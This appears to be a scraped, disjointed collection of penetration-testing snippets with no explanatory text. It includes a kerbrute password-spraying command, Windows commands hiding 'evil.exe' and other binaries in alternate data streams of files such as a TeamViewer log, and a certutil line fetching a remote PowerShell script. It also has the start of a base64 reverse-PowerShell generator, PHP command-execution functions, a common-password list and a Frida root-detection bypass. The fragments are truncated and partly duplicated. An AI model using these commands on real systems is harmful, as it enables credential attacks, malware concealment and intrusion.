With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
#!/usr/bin/env python3 | |
# | |
# generate reverse powershell cmdline with base64 encoded args | |
# | |
import sys | |
import base64 | |
def help(): | |
print("USAGE: %s IP PORT" % sys.argv[0]) |
#!/usr/bin/env python3 | |
""" | |
License: MIT License | |
Copyright (c) 2023 Miel Donkers | |
Very simple HTTP server in python for logging requests | |
Usage:: | |
./server.py [<port>] | |
""" | |
from http.server import BaseHTTPRequestHandler, HTTPServer |
exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
password | |
princess | |
123456 | |
sunshine | |
princess1 | |
abc123 | |
jordan23 | |
blessed1 | |
Password1 | |
password1 |
.php | |
.html | |
.txt | |
.htm | |
.aspx | |
.asp | |
.js | |
.css | |
.pgsql.txt | |
.mysql.txt |
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt
Java.perform(function () { | |
console.log("\nRoot detection bypass with Frida"); | |
var CommonUtils = Java.use("io.fabric.sdk.android.services.common.CommonUtils"); | |
console.log("\nHijacking isRooted function in CommonUtils class"); | |
CommonUtils.isRooted.implementation = function () { | |
console.log("\nInside the isRooted function"); | |
return false; | |
}; | |
console.log("\nRoot detection bypassed"); | |
console.log("\n"); |